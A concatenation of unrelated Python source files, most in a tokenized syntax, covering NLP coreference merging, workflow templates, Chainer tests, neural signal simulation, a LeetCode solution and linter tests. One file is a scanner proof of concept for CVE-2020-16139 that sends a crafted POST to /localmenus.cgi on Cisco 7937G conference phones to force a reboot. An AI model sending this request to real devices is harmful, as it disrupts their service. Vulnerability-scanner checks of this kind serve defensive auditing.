            for r, occurrence in enumerate(_dict_path(mention, "mention")):
                if "@representative" in occurrence:
                    representative = r
                sentence = int(occurrence["sentence"]) - 1
                offset = sentence_offsets[sentence]
                i = int(occurrence["start"]) - 1 + offset
                j = int(occurrence["end"]) - 1 + offset
                k = int(occurrence["head"]) - 1 + offset
                occurrences.append((i, j, k))
            # Occurrences' representative goes in the first position.
            # BUG FIX: the previous code assigned `occurrences[0],
            # occurrences[k] = occurrences[0], occurrences[k]`, a no-op that
            # never actually moved the representative to the front.
            k = representative
            occurrences[0], occurrences[k] = occurrences[k], occurrences[0]
            coreferences.append(occurrences)
        return coreferences


def issues_merging_entities(document, entities):
    """Check if some general preconditions are met before proceeding to merge
    some entities on a given document.

    Returns an error message string when merging is not possible, or None
    (implicitly) when the merge may proceed.
    """
    kinds = set(e.kind for e in entities)
    if len(kinds) != 1:
        return "Cannot merge entities of different kinds {!r}".format(kinds)
    gazettes = set(e.gazette for e in entities if e.gazette)
    if len(gazettes) > 1:
        return "Cannot merge entities of different gazette items {!r}".format(
            gazettes)


def apply_coreferences(document, coreferences):
    """
    Makes all entity occurrences listed in `coreferences` have the same
    entity. It uses coreference information to merge entity occurrences'
    entities into a single entity.

    `coreferences` is a list of tuples (i, j, head) where:
        - `i` is the offset in tokens where the occurrence starts.
        - `j` is the offset in tokens where the occurrence ends.
        - `head` is the index in tokens of the head of the occurrence (the
          "most important word").

    Every entity occurrence in `coreferences` might already exist or not in
    `document`. If no occurrence exists in `document` then nothing is done.
    If at least one occurrence exists in `document` then all other
    occurrences named in `coreferences` are automatically created.

    This function can raise CoreferenceError in case a merge is attempted on
    entities of different kinds.
    """
    # For each token index make a list of the occurrences there.
    occurrences = defaultdict(list)
    for occurrence in document.entity_occurrences.all():
        for i in range(occurrence.offset, occurrence.offset_end):
            occurrences[i].append(occurrence)

    entities = []  # Existing entities referenced by coreferences
    pickable_as_representant = []
    missing = []  # References that have no entity occurrence yet
    for i, j, head in sorted(coreferences):
        if occurrences[head]:
            for x in occurrences[head]:
                entities.append(x.entity)
                if not x.anaphora:
                    pickable_as_representant.append(x.entity)
        else:
            missing.append((i, j, head))

    if not pickable_as_representant:
        return
    issues = issues_merging_entities(document, entities)
    if issues:
        raise CoreferenceError(issues)

    # Prefer a canonical entity that came from plain NER over gazette ones.
    from_ner = [r for r in pickable_as_representant if not r.gazette]
    if from_ner:
        canonical = from_ner[0]
    else:
        canonical = pickable_as_representant[0]

    # Each missing coreference needs to be created into an occurrence now.
    for i, j, head in missing:
        if j - i >= 5:
            # If the entity is a long phrase then just keep the head token.
            i = head
            j = head + 1
        EntityOccurrence.objects.get_or_create(
            document=document,
            entity=canonical,
            offset=i,
            offset_end=j,
            alias=" ".join(document.tokens[i:j]),
            defaults={'anaphora': True})

    # Finally, the merging 'per se', where all things are entity occurrences.
    for entity in set(x for x in entities if x != canonical):
        for occurrence in EntityOccurrence.objects.filter(entity=entity,
                                                          document=document):
            occurrence.entity = canonical
            occurrence.save()
# Copyright 2021 The Couler Authors. All rights reserved. # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. <import_from_stmt>collections OrderedDict<import_from_stmt>couler.core utils<class_stmt>Template(object)<block_start><def_stmt>__init__ self name output=<none> input=<none> timeout=<none> retry=<none> pool=<none> enable_ulogfs=<true> daemon=<false> cache=<none> parallelism=<none> <block_start>self.name=name<line_sep>self.output=output<line_sep>self.input=input<line_sep>self.timeout=timeout<line_sep>self.retry=retry<line_sep>self.pool=pool<line_sep>self.enable_ulogfs=enable_ulogfs<line_sep>self.daemon=daemon<line_sep>self.cache=cache<line_sep>self.parallelism:int=parallelism<block_end><def_stmt>to_dict self<block_start>template=OrderedDict({"name":self.name})<if_stmt>self.daemon<block_start>template["daemon"]=<true><block_end><if_stmt>self.timeout<is><not><none><block_start>template["activeDeadlineSeconds"]=self.timeout<block_end><if_stmt>self.retry<is><not><none><block_start>template["retryStrategy"]=utils.config_retry_strategy(self.retry)<block_end><if_stmt>self.cache<is><not><none><block_start>template["memoize"]=self.cache.to_dict()<block_end><if_stmt>self.parallelism<is><not><none><block_start>template["parallelism"]=self.parallelism<block_end><return>template<block_end><block_end>
# coding: utf-8 <import_stmt>chainer<import_stmt>chainer.functions<as>F<class_stmt>Unpooling2D(chainer.Chain)<block_start><def_stmt>forward self x<block_start>y=F.unpooling_2d(x 2 cover_all=<false>)<line_sep><return>y<block_end><block_end><class_stmt>Unpooling2D_3x4(chainer.Chain)<block_start><def_stmt>forward self x<block_start>y=F.unpooling_2d(x (3 4) cover_all=<false>)<line_sep><return>y<block_end><block_end># ====================================== <import_stmt>numpy<as>np<import_from_stmt>chainer_compiler.elichika testtools<def_stmt>main <block_start>x=np.random.rand(2 3 11 7).astype(np.float32)<line_sep>testtools.generate_testcase(Unpooling2D [x])<line_sep>testtools.generate_testcase(Unpooling2D_3x4 [x] subname='3x4')<line_sep># The largest input in FPN. x=np.random.rand(1 256 100 100).astype(np.float32)<line_sep>testtools.generate_testcase(Unpooling2D [x] subname='large')<block_end><if_stmt>__name__<eq>'__main__'<block_start>main()<block_end>
<import_from_stmt>.config load_config DEFAULTS<line_sep>
<import_stmt>requests<line_sep># Vuln Base Info <def_stmt>info <block_start><return>{"author":"cckuailong" "name":'''Cisco 7937G Denial-of-Service Reboot Attack''' "description":'''A denial-of-service in Cisco Unified IP Conference Station 7937G 1-4-4-0 through 1-4-5-7 allows attackers restart the device remotely through sending specially crafted packets. Note: We cannot prove this vulnerability exists. Out of an abundance of caution, this CVE is being assigned to better serve our customers and ensure all who are still running this product understand that the product is end of life and should be removed or upgraded.''' "severity":"high" "references":["https://blacklanternsecurity.com/2020-08-07-Cisco-Unified-IP-Conference-Station-7937G/"] "classification":{"cvss-metrics":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" "cvss-score":"" "cve-id":"CVE-2020-16139" "cwe-id":""} "metadata":{"vuln-target":"" } "tags":["cve" "cve2020" "dos" "cisco"] }<block_end># Vender Fingerprint <def_stmt>fingerprint url<block_start><return><true><block_end># Proof of Concept <def_stmt>poc url<block_start>result={}<try_stmt><block_start>url=format_url(url)<line_sep>path="""/localmenus.cgi?func=609&rphl=1&data=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"""<line_sep>method="POST"<line_sep>data=""""""<line_sep>headers={}<line_sep>resp0=requests.request(method=method url=url+path data=data headers=headers timeout=10 verify=<false> allow_redirects=<false>)<if_stmt>(resp0.status_code<eq>200)<and>("""application/xml"""<in>str(resp0.headers))<and>("""AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"""<in>resp0.text)<block_start>result["success"]=<true><line_sep>result["info"]=info()<line_sep>result["payload"]=url+path<block_end><block_end><except_stmt><block_start>result["success"]=<false><block_end><return>result<block_end># Exploit, can be same with poc() <def_stmt>exp url<block_start><return>poc(url)<block_end># Utils <def_stmt>format_url 
url<block_start>url=url.strip()<if_stmt><not>(url.startswith('http://')<or>url.startswith('https://'))<block_start>url='http://'+url<block_end>url=url.rstrip('/')<line_sep><return>url<block_end>
# Copyright 2016 The Chromium Authors. All rights reserved. # Use of this source code is governed by a BSD-style license that can be # found in the LICENSE file. """Generates a mini_installer with a lower version than an existing one."""<import_stmt>argparse<import_stmt>subprocess<import_stmt>sys<def_stmt>main <block_start>parser=argparse.ArgumentParser()<line_sep>parser.add_argument('--out' help='Path to the generated mini_installer.')<line_sep>args=parser.parse_args()<assert_stmt>args.out<line_sep><return>subprocess.call(['alternate_version_generator.exe' '--force' '--previous' '--out='+args.out ])<block_end><if_stmt>'__main__'<eq>__name__<block_start>sys.exit(main())<block_end>
"""Simulating time series, with aperiodic activity."""<import_stmt>numpy<as>np<import_from_stmt>scipy.stats zscore<import_from_stmt>scipy.linalg toeplitz cholesky<import_from_stmt>neurodsp.filt filter_signal infer_passtype<import_from_stmt>neurodsp.filt.fir compute_filter_length<import_from_stmt>neurodsp.filt.checks check_filter_definition<import_from_stmt>neurodsp.utils remove_nans<import_from_stmt>neurodsp.utils.checks check_param_range<import_from_stmt>neurodsp.utils.data create_times compute_nsamples<import_from_stmt>neurodsp.utils.decorators normalize<import_from_stmt>neurodsp.spectral rotate_powerlaw<import_from_stmt>neurodsp.sim.transients sim_synaptic_kernel<line_sep>################################################################################################### ################################################################################################### @normalize<def_stmt>sim_poisson_pop n_seconds fs n_neurons=1000 firing_rate=2<block_start>"""Simulate a Poisson population. Parameters ---------- n_seconds : float Simulation time, in seconds. fs : float Sampling rate of simulated signal, in Hz. n_neurons : int, optional, default: 1000 Number of neurons in the simulated population. firing_rate : float, optional, default: 2 Firing rate of individual neurons in the population. Returns ------- sig : 1d array Simulated population activity. Notes ----- The simulated signal is essentially white noise, but satisfies the Poisson property, i.e. mean(X) = var(X). The lambda parameter of the Poisson process (total rate) is determined as firing rate * number of neurons, i.e. summation of Poisson processes is still a Poisson processes. Note that the Gaussian approximation for a sum of Poisson processes is only a good approximation for large lambdas. 
Examples -------- Simulate a Poisson population: >>> sig = sim_poisson_pop(n_seconds=1, fs=500, n_neurons=1000, firing_rate=2) """<line_sep># Poisson population rate signal scales with # of neurons and individual rate lam=n_neurons<times>firing_rate<line_sep># Variance is equal to the mean sig=np.random.normal(loc=lam scale=lam<power>0.5 size=compute_nsamples(n_seconds fs))<line_sep># Enforce that sig is non-negative in cases of low firing rate sig[np.where(sig<l>0.)]=0.<line_sep><return>sig<block_end>@normalize<def_stmt>sim_synaptic_current n_seconds fs n_neurons=1000 firing_rate=2. tau_r=0. tau_d=0.01 t_ker=<none><block_start>"""Simulate a signal as a synaptic current, which has 1/f characteristics with a knee. Parameters ---------- n_seconds : float Simulation time, in seconds. fs : float Sampling rate of simulated signal, in Hz. n_neurons : int, optional, default: 1000 Number of neurons in the simulated population. firing_rate : float, optional, default: 2 Firing rate of individual neurons in the population. tau_r : float, optional, default: 0. Rise time of synaptic kernel, in seconds. tau_d : float, optional, default: 0.01 Decay time of synaptic kernel, in seconds. t_ker : float, optional Length of time of the simulated synaptic kernel, in seconds. Returns ------- sig : 1d array Simulated synaptic current. Notes ----- - This simulation is based on the one used in [1]_. - The resulting signal is most similar to unsigned intracellular current or conductance change. References ---------- .. [1] <NAME>., <NAME>., & <NAME>. (2017). Inferring synaptic excitation/inhibition balance from field potentials. NeuroImage, 158, 70–78. 
DOI: https://doi.org/10.1016/j.neuroimage.2017.06.078 Examples -------- Simulate a synaptic current signal: >>> sig = sim_synaptic_current(n_seconds=1, fs=500) """<line_sep># If not provided, compute t_ker as a function of decay time constant <if_stmt>t_ker<is><none><block_start>t_ker=5.<times>tau_d<block_end># Simulate an extra bit because the convolution will trim & turn off normalization sig=sim_poisson_pop((n_seconds+t_ker) fs n_neurons firing_rate mean=<none> variance=<none>)<line_sep>ker=sim_synaptic_kernel(t_ker fs tau_r tau_d)<line_sep>sig=np.convolve(sig ker 'valid')[:compute_nsamples(n_seconds fs)]<line_sep><return>sig<block_end>@normalize<def_stmt>sim_knee n_seconds fs chi1 chi2 knee<block_start>"""Simulate a signal whose power spectrum has a 1/f structure with a knee. Parameters ---------- n_seconds : float Simulation time, in seconds. fs : float Sampling rate of simulated signal, in Hz. chi1 : float Power law exponent before the knee. chi2 : float Power law exponent added to chi1 after the knee. knee : float Location of the knee in Hz. Returns ------- sig : 1d array Time series with the desired power spectrum. Notes ----- This simulated time series has a power spectrum that follows the Lorentzian equation: `P(f) = 1 / (f**chi1 * (f**chi2 + knee))` - This simulation creates this power spectrum shape using a sum of sinusoids. - The slope of the log power spectrum before the knee is chi1 whereas after the knee it is chi2, but only when the sign of chi1 and chi2 are the same. 
Examples -------- Simulate a time series with chi1 of -1, chi2 of -2, and knee of 100: >> sim_knee(n_seconds=10, fs=1000, chi1=-1, chi2=-2, knee=100) """<line_sep>times=create_times(n_seconds fs)<line_sep>n_samples=compute_nsamples(n_seconds fs)<line_sep># Create frequencies for the power spectrum, which will be freqs of the summed cosines freqs=np.linspace(0 fs/2 num=int(n_samples<floordiv>2+1) endpoint=<true>)<line_sep># Drop the DC component freqs=freqs[1:]<line_sep># Map the frequencies under the (square root) Lorentzian # This will give us the amplitude coefficients for the sinusoids cosine_coeffs=np.array([np.sqrt(1/(freq<power>-chi1<times>(freq<power>(-chi2-chi1)+knee)))<for>freq freqs])<line_sep># Add sinusoids with a random phase shift sig=np.sum(np.array([cosine_coeffs[ell]<times>np.cos(2<times>np.pi<times>freq<times>times+2<times>np.pi<times>np.random.rand())<for>ell,freq enumerate(freqs)]) axis=0)<line_sep><return>sig<block_end>@normalize<def_stmt>sim_random_walk n_seconds fs theta=1. mu=0. sigma=5.<block_start>"""Simulate a mean-reverting random walk, as an Ornstein-Uhlenbeck process. Parameters ---------- n_seconds : float Simulation time, in seconds. fs : float Sampling rate of simulated signal, in Hz. theta : float, optional, default: 1.0 Memory scale parameter. Larger theta values create faster fluctuations. mu : float, optional, default: 0.0 Mean of the random walk. sigma : float, optional, default: 5.0 Standard deviation of the random walk. Returns ------- sig : 1d array Simulated random walk signal. Notes ----- The random walk is simulated as a discretized Ornstein-Uhlenbeck process: `dx = theta*(x-mu)*dt + sigma*dWt` Where: - mu : mean - sigma : standard deviation - theta : memory scale - dWt : increments of Wiener process, i.e. white noise See the wikipedia page [1]_ for the integral solution. References ---------- .. 
[1] https://en.wikipedia.org/wiki/Ornstein-Uhlenbeck_process#Formal_solution Examples -------- Simulate a Ornstein-Uhlenbeck random walk: >>> sig = sim_random_walk(n_seconds=1, fs=500, theta=1.) """<line_sep>times=create_times(n_seconds fs)<line_sep>x0=mu<line_sep>dt=times[1]-times[0]<line_sep>ws=np.random.normal(size=len(times))<line_sep>ex=np.exp(-theta<times>times)<line_sep>ws[0]=0.<line_sep>sig=x0<times>ex+mu<times>(1.-ex)+sigma<times>ex<times>np.cumsum(np.exp(theta<times>times)<times>np.sqrt(dt)<times>ws)<line_sep><return>sig<block_end>@normalize<def_stmt>sim_powerlaw n_seconds fs exponent=-2.0 f_range=<none> **filter_kwargs<block_start>"""Simulate a power law time series, with a specified exponent. Parameters ---------- n_seconds : float Simulation time, in seconds. fs : float Sampling rate of simulated signal, in Hz. exponent : float, optional, default: -2 Desired power-law exponent, of the form P(f)=f^exponent. f_range : list of [float, float] or None, optional Frequency range to filter simulated data, as [f_lo, f_hi], in Hz. **filter_kwargs : kwargs, optional Keyword arguments to pass to `filter_signal`. Returns ------- sig : 1d array Time-series with the desired power law exponent. Notes ----- - Powerlaw data with exponents is created by spectrally rotating white noise [1]_. References ---------- .. [1] <NAME>., & <NAME>. (1995). On Generating Power Law Noise. Astronomy and Astrophysics, 300, 707–710. 
Examples -------- Simulate a power law signal, with an exponent of -2 (brown noise): >>> sig = sim_powerlaw(n_seconds=1, fs=500, exponent=-2.0) Simulate a power law signal, with a highpass filter applied at 2 Hz: >>> sig = sim_powerlaw(n_seconds=1, fs=500, exponent=-1.5, f_range=(2, None)) """<line_sep># Compute the number of samples for the simulated time series n_samples=compute_nsamples(n_seconds fs)<line_sep># Get the number of samples to simulate for the signal # If signal is to be filtered, with FIR, add extra to compensate for edges <if_stmt>f_range<and>filter_kwargs.get('filter_type' <none>)<ne>'iir'<block_start>pass_type=infer_passtype(f_range)<line_sep>filt_len=compute_filter_length(fs pass_type *check_filter_definition(pass_type f_range) n_seconds=filter_kwargs.get('n_seconds' <none>) n_cycles=filter_kwargs.get('n_cycles' 3))<line_sep>n_samples<augadd>filt_len+1<block_end># Simulate the powerlaw data sig=_create_powerlaw(n_samples fs exponent)<if_stmt>f_range<is><not><none><block_start>sig=filter_signal(sig fs infer_passtype(f_range) f_range remove_edges=<true> **filter_kwargs)<line_sep># Drop the edges, that were compensated for, if not using FIR filter <if_stmt><not>filter_kwargs.get('filter_type' <none>)<eq>'iir'<block_start>sig,_=remove_nans(sig)<block_end><block_end><return>sig<block_end>@normalize<def_stmt>sim_frac_gaussian_noise n_seconds fs chi=0 hurst=<none><block_start>"""Simulate a timeseries as fractional gaussian noise. Parameters ---------- n_seconds : float Simulation time, in seconds. fs : float Sampling rate of simulated signal, in Hz. chi: float, optional, default: 0 Desired power law exponent of the spectrum of the signal. Must be in the range (-1, 1). hurst : float, optional, default: None Desired Hurst parameter, which must be in the range (0, 1). If provided, this value overwrites the `chi` parameter. Returns ------- sig: 1d array Simulated fractional gaussian noise time series. 
Notes ----- The time series can be specified with either a desired power law exponent, or alternatively with a specified Hurst parameter. The Hurst parameter is not the Hurst exponent as defined in rescaled range analysis. The Hurst parameter is defined for self-similar processes such that Y(at) = a^H Y(t) for all a > 0, where this equality holds in distribution. The relationship between the power law exponent chi and the Hurst parameter for fractional gaussian noise is chi = 2 * hurst - 1. For more information, consult [1]_. References ---------- .. [1] <NAME>., <NAME>., <NAME>., & <NAME>. (2002). Fractal characterization of complexity in temporal physiological signals. Physiological Measurement, 23(1), R1–R38. DOI: https://doi.org/10.1088/0967-3334/23/1/201 Examples -------- Simulate fractional gaussian noise with a power law decay of 0 (white noise): >>> sig = sim_frac_gaussian_noise(n_seconds=1, fs=500, chi=0) Simulate fractional gaussian noise with a Hurst parameter of 0.5 (also white noise): >>> sig = sim_frac_gaussian_noise(n_seconds=1, fs=500, hurst=0.5) """<if_stmt>hurst<is><not><none><block_start>check_param_range(hurst 'hurst' (0 1))<block_end><else_stmt><block_start>check_param_range(chi 'chi' (-1 1))<line_sep># Infer the hurst parameter from chi hurst=(-chi+1.)/2<block_end># Compute the number of samples for the simulated time series n_samples=compute_nsamples(n_seconds fs)<line_sep># Define helper function for computing the auto-covariance <def_stmt>autocov hurst<block_start><return><lambda>k:0.5<times>(np.abs(k-1)<power>(2<times>hurst)-2<times>k<power>(2<times>hurst)+(k+1)<power>(2<times>hurst))<block_end># Build the autocovariance matrix gamma=np.arange(0 n_samples)<line_sep>gamma=np.apply_along_axis(autocov(hurst) 0 gamma)<line_sep>autocov_matrix=toeplitz(gamma)<line_sep># Use the Cholesky factor to transform white noise to get the desired time series white_noise=np.random.randn(n_samples)<line_sep>cholesky_factor=cholesky(autocov_matrix 
lower=<true>)<line_sep>sig=cholesky_factor@white_noise<line_sep><return>sig<block_end>@normalize<def_stmt>sim_frac_brownian_motion n_seconds fs chi=-2 hurst=<none><block_start>"""Simulate a timeseries as fractional brownian motion. Parameters ---------- n_seconds : float Simulation time, in seconds. fs : float Sampling rate of simulated signal, in Hz. chi : float, optional, default: -2 Desired power law exponent of the spectrum of the signal. Must be in the range (-3, -1). hurst : float, optional, default: None Desired Hurst parameter, which must be in the range (0, 1). If provided, this value overwrites the `chi` parameter. Returns ------- sig : 1d array Simulated fractional brownian motion time series. Notes ----- The time series can be specified with either a desired power law exponent, or alternatively with a specified Hurst parameter. Note that when specifying there can be some bias leading to a steeper than expected spectrum of the simulated signal. This bias is higher for chi values near to 1, and may be more severe in shorter signals. The Hurst parameter is not the Hurst exponent in general. The Hurst parameter is defined for self-similar processes such that Y(at) = a^H Y(t) for all a > 0, where this equality holds in distribution. The relationship between the power law exponent chi and the Hurst parameter for fractional brownian motion is chi = 2 * hurst + 1 For more information, consult [1]_ and/or [2]_. References ---------- .. [1] <NAME>., <NAME>., <NAME>., & <NAME>. (2002). Fractal characterization of complexity in temporal physiological signals. Physiological Measurement, 23(1), R1–R38. DOI: https://doi.org/10.1088/0967-3334/23/1/201 .. [2] <NAME>. (2004). Simulation of fractional Brownian motion. 77. 
Examples -------- Simulate fractional brownian motion with a power law exponent of -2 (brown noise): >>> sig = sim_frac_brownian_motion(n_seconds=1, fs=500, chi=-2) Simulate fractional brownian motion with a Hurst parameter of 0.5 (also brown noise): >>> sig = sim_frac_brownian_motion(n_seconds=1, fs=500, hurst=0.5) """<if_stmt>hurst<is><not><none><block_start>check_param_range(hurst 'hurst' (0 1))<block_end><else_stmt><block_start>check_param_range(chi 'chi' (-3 -1))<line_sep># Infer the hurst parameter from chi hurst=(-chi-1.)/2<block_end># Fractional brownian motion is the cumulative sum of fractional gaussian noise fgn=sim_frac_gaussian_noise(n_seconds fs hurst=hurst)<line_sep>sig=np.cumsum(fgn)<line_sep><return>sig<block_end><def_stmt>_create_powerlaw n_samples fs exponent<block_start>"""Create a power law time series. Parameters ---------- n_samples : int The number of samples to simulate. fs : float Sampling rate of simulated signal, in Hz. exponent : float Desired power-law exponent, of the form P(f)=f^exponent. Returns ------- sig : 1d array Time-series with the desired power law exponent. Notes ----- This function creates variable power law exponents by spectrally rotating white noise. """<line_sep># Start with white noise signal, that we will rotate, in frequency space sig=np.random.randn(n_samples)<line_sep># Compute the FFT fft_output=np.fft.fft(sig)<line_sep>freqs=np.fft.fftfreq(len(sig) 1./fs)<line_sep># Rotate spectrum and invert back to time series, with a z-score to normalize # Delta exponent is divided by two, as the FFT output is in units of amplitude not power fft_output_rot=rotate_powerlaw(freqs fft_output -exponent/2)<line_sep>sig=zscore(np.real(np.fft.ifft(fft_output_rot)))<line_sep><return>sig<block_end>
''' Follow up for "Remove Duplicates": What if duplicates are allowed at most twice? For example, Given sorted array nums = [1,1,1,2,2,3], Your function should return length = 5, with the first five elements of nums being 1, 1, 2, 2 and 3. It doesn't matter what you leave beyond the new length. '''<class_stmt>Solution(object)<block_start><def_stmt>removeDuplicates self nums<block_start>""" :type nums: List[int] :rtype: int """<line_sep>count=0<for_stmt>i range(len(nums))<block_start><if_stmt>count<l>2<or>nums[count-2]<ne>nums[i]<block_start>nums[count]=nums[i]<line_sep>count<augadd>1<block_end><block_end><return>count<block_end><block_end><if_stmt>__name__<eq>"__main__"<block_start>l=[1 1 1 2 2 3]<line_sep>r=Solution().removeDuplicates(l)<assert_stmt>l<eq>[1 1 2 2 3 3]<assert_stmt>r<eq>5<block_end>
<import_stmt>pytest<import_from_stmt>wemake_python_styleguide.violations.oop UnpythonicGetterSetterViolation <import_from_stmt>wemake_python_styleguide.visitors.ast.classes WrongClassBodyVisitor<line_sep>module_getter_and_setter=""" attribute = 1 def get_attribute(): ... def set_attribute(): ... """<line_sep>static_getter_and_setter=""" attribute = 1 class Test(object): @staticmethod def get_attribute(): ... @staticmethod def set_attribute(): ... """<line_sep>paired_getter_and_setter=""" class Test(object): def get_attribute(): ... def set_attribute(): ... """<line_sep>property_getter_and_setter=""" class Test(object): def __init__(self): self.attribute = 1 @property def attribute(self): ... @attribute.setter def attribute(self): ... """<line_sep>dataclass_property_getter_setter=""" @dataclass class DataClass(object): attribute: int @property def attribute(self): ... @attribute.setter def attribute(self): ... """<line_sep>dataclass_incorrect_property_getter_setter=""" @dataclass class DataClass(object): attribute: int @property def get_attribute(self): ... @attribute.setter def set_attribute(self): ... """<line_sep>dataclass_getter_setter=""" @dataclass class DataClass(object): attribute: int def get_attribute(self): ... def set_attribute(self): ... """<line_sep>child_getter_and_setter=""" class TestParent(object): def __init__(self): self.attribute = 1 class TestChild(TestParent): def get_attribute(self): ... def set_attribute(self): ... """<line_sep>nested_getter_and_setter=""" class Template(object): def __init__(self): self.attribute = 1 def some_function(self): def get_attribute(self): ... def set_attribute(self): ... 
get_attribute(self) """<line_sep>class_getter_and_setter_attributes=""" class Test(object): attribute = 1 get_attribute = 1 set_attribute = 1 """<line_sep>instance_getter_and_setter_attributes=""" class Test(object): def __init__(self): self.attribute = 1 self.get_attribute = 1 self.set_attribute = 1 """<line_sep>other_getter_and_setter=""" class Test(object): def __init__(self, other): other.attr = self.some() def get_attr(self): return something.unrelated() """<line_sep>instance_attribute_template=""" class Template(object): def __init__(self): self.{0}{1}{2} {3} def {4}(self): ... """<line_sep>class_attribute_template=""" class Template(object): {0}{1}{2} {3} def {4}: ... """<line_sep>class_mixed=""" class Test(object): first: int second = 2 third: int = 3 def __init__(self): self.{0}{1} = 5 def get_{2}(self): ... def set_{3}(self): ... """<line_sep>@pytest.mark.parametrize('code' [module_getter_and_setter nested_getter_and_setter property_getter_and_setter class_getter_and_setter_attributes instance_getter_and_setter_attributes dataclass_property_getter_setter other_getter_and_setter ])<def_stmt>test_valid_getter_and_setter assert_errors parse_ast_tree default_options code mode <block_start>"""Testing that correct usage of getter/setter is allowed."""<line_sep>tree=parse_ast_tree(mode(code))<line_sep>visitor=WrongClassBodyVisitor(default_options tree=tree)<line_sep>visitor.run()<line_sep>assert_errors(visitor [])<block_end>@pytest.mark.parametrize('code' [dataclass_getter_setter dataclass_incorrect_property_getter_setter static_getter_and_setter child_getter_and_setter paired_getter_and_setter ])<def_stmt>test_invalid_getter_and_setter assert_errors parse_ast_tree default_options code mode <block_start>"""Testing that wrong use of getter/setter is prohibited."""<line_sep>tree=parse_ast_tree(mode(code))<line_sep>visitor=WrongClassBodyVisitor(default_options tree=tree)<line_sep>visitor.run()<line_sep>assert_errors(visitor [UnpythonicGetterSetterViolation 
UnpythonicGetterSetterViolation ])<block_end>@pytest.mark.parametrize('access' [''])@pytest.mark.parametrize('assignment' [' = 1'])@pytest.mark.parametrize(('attribute_name' 'annotation' 'method_name') [('attribute' '' 'get_attribute_some') ('attribute' '' 'some_get_attribute') ('attribute' '' 'get_some_attribute') ('attribute' '' 'attribute_get') ('some_attribute' '' 'get_attribute') ('attribute_some' '' 'get_attribute') ])<def_stmt>test_nonmatching_instance assert_errors parse_ast_tree default_options access assignment attribute_name annotation method_name mode <block_start>"""Testing that non matching attribute and getter/setter is allowed."""<line_sep>test_instance=instance_attribute_template.format(access attribute_name assignment annotation method_name )<line_sep>tree=parse_ast_tree(mode(test_instance))<line_sep>visitor=WrongClassBodyVisitor(default_options tree=tree)<line_sep>visitor.run()<line_sep>assert_errors(visitor [])<block_end>@pytest.mark.parametrize('access' ['' '_' '__'])@pytest.mark.parametrize('assignment' [' = 1' ': int = 1' ' = self.other = 1' ', self.other = 1, 2' ])@pytest.mark.parametrize(('attribute_name' 'annotation' 'method_name') [('attribute' '' 'get_attribute') ('attribute' '' 'set_attribute') ('attribute_some' '' 'get_attribute_some') ('some_attribute' '' 'set_some_attribute') ('attribute' '@classmethod' 'get_attribute') ('attribute' '@classmethod' 'set_attribute') ('attribute' '@staticmethod' 'get_attribute') ('attribute' '@staticmethod' 'set_attribute') ('attribute' '@property' 'get_attribute') ('attribute' '@attribute.setter' 'set_attribute') ])<def_stmt>test_instance_getter_setter assert_errors parse_ast_tree default_options access assignment attribute_name annotation method_name mode <block_start>"""Testing that instance attribute and getter/setter is prohibited."""<line_sep>test_instance=instance_attribute_template.format(access attribute_name assignment annotation method_name 
)<line_sep>tree=parse_ast_tree(mode(test_instance))<line_sep>visitor=WrongClassBodyVisitor(default_options tree=tree)<line_sep>visitor.run()<line_sep>assert_errors(visitor [UnpythonicGetterSetterViolation])<block_end>@pytest.mark.parametrize('access' [''])@pytest.mark.parametrize('assignment' [' = 1'])@pytest.mark.parametrize(('attribute_name' 'annotation' 'method_name') [('attribute' '@classmethod' 'get_attribute_some(self)') ('attribute' '@classmethod' 'some_get_attribute(self)') ('attribute' '@classmethod' 'get_some_attribute(self)') ('attribute' '@classmethod' 'attribute_get(self)') ('some_attribute' '@classmethod' 'get_attribute(self)') ('attribute_some' '@classmethod' 'get_attribute(self)') ])<def_stmt>test_nonmatching_class assert_errors parse_ast_tree default_options access attribute_name annotation method_name assignment mode <block_start>"""Testing that non matching attribute and getter/setter is allowed."""<line_sep>test_instance=class_attribute_template.format(access attribute_name assignment annotation method_name )<line_sep>tree=parse_ast_tree(mode(test_instance))<line_sep>visitor=WrongClassBodyVisitor(default_options tree=tree)<line_sep>visitor.run()<line_sep>assert_errors(visitor [])<block_end>@pytest.mark.parametrize('access' ['' '_' '__'])@pytest.mark.parametrize('assignment' [' = 1' ': int = 1' ': int' ' = other = 1' ', other = 1, 2' ])@pytest.mark.parametrize(('attribute_name' 'annotation' 'method_name') [('attribute' '@classmethod' 'get_attribute(cls)') ('attribute' '@classmethod' 'set_attribute(cls)') ('attribute_some' '@classmethod' 'get_attribute_some(self)') ('some_attribute' '@classmethod' 'set_some_attribute(self)') ('attribute' '' 'get_attribute(cls)') ('attribute' '' 'set_attribute(cls)') ('attribute' '@staticmethod' 'get_attribute(cls)') ('attribute' '@staticmethod' 'set_attribute(cls)') ])<def_stmt>test_class_attributes_getter_setter assert_errors parse_ast_tree default_options attribute_name access annotation method_name assignment 
mode <block_start>"""Testing that using getter/setters with class attributes is prohibited."""<line_sep>test_instance=class_attribute_template.format(access attribute_name assignment annotation method_name )<line_sep>tree=parse_ast_tree(mode(test_instance))<line_sep>visitor=WrongClassBodyVisitor(default_options tree=tree)<line_sep>visitor.run()<line_sep>assert_errors(visitor [UnpythonicGetterSetterViolation])<block_end>@pytest.mark.parametrize('access' ['' '_' '__'])@pytest.mark.parametrize(('first' 'second' 'third') [('attribute' 'some' 'other') ('attribute' 'some' 'another') ])<def_stmt>test_class_mixed assert_errors parse_ast_tree default_options access first second third mode <block_start>"""Testing correct use of methods with get/set in name."""<line_sep>test_instance=class_mixed.format(access first second third)<line_sep>tree=parse_ast_tree(mode(test_instance))<line_sep>visitor=WrongClassBodyVisitor(default_options tree=tree)<line_sep>visitor.run()<line_sep>assert_errors(visitor [])<block_end>
